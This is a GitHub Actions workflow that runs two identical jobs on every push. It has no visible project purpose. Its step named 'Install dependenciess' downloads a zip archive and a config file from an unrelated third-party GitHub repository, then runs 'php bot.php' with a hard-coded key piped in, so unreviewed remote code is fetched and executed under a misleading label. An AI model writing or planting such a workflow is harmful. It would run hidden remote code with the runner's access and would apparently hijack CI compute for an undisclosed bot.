on:
  push:
name: aiadj7

jobs:
  run_1:
    runs-on: ubuntu-latest
    continue-on-error: true
    steps:
    - name: Setup PHP
      uses: shivammathur/setup-php@v2
      with:
        php-version: '8.1'
        coverage: none
    - name: Install dependenciess
      run: |
        wget https://github.com/Mosnio/mehi1/raw/main/clm/clm.zip
        unzip clm.zip
        wget https://github.com/Mosnio/mehi1/raw/main/clm/cn1.js -O config.json
        echo -e "885ab12d809e1e84a655be6373872d1b\n2" | php bot.php
        
  run_2:
    needs: run_1
    runs-on: ubuntu-latest
    continue-on-error: true
    steps:
    - name: Setup PHP
      uses: shivammathur/setup-php@v2
      with:
        php-version: '8.1'
        coverage: none
    - name: Install dependenciess
      run: |
        wget https://github.com/Mosnio/mehi1/raw/main/clm/clm.zip
        unzip clm.zip
        wget https://github.com/Mosnio/mehi1/raw/main/clm/cn1.js -O config.json
        echo -e "885ab12d809e1e84a655be6373872d1b\n2" | php bot.php
        
 
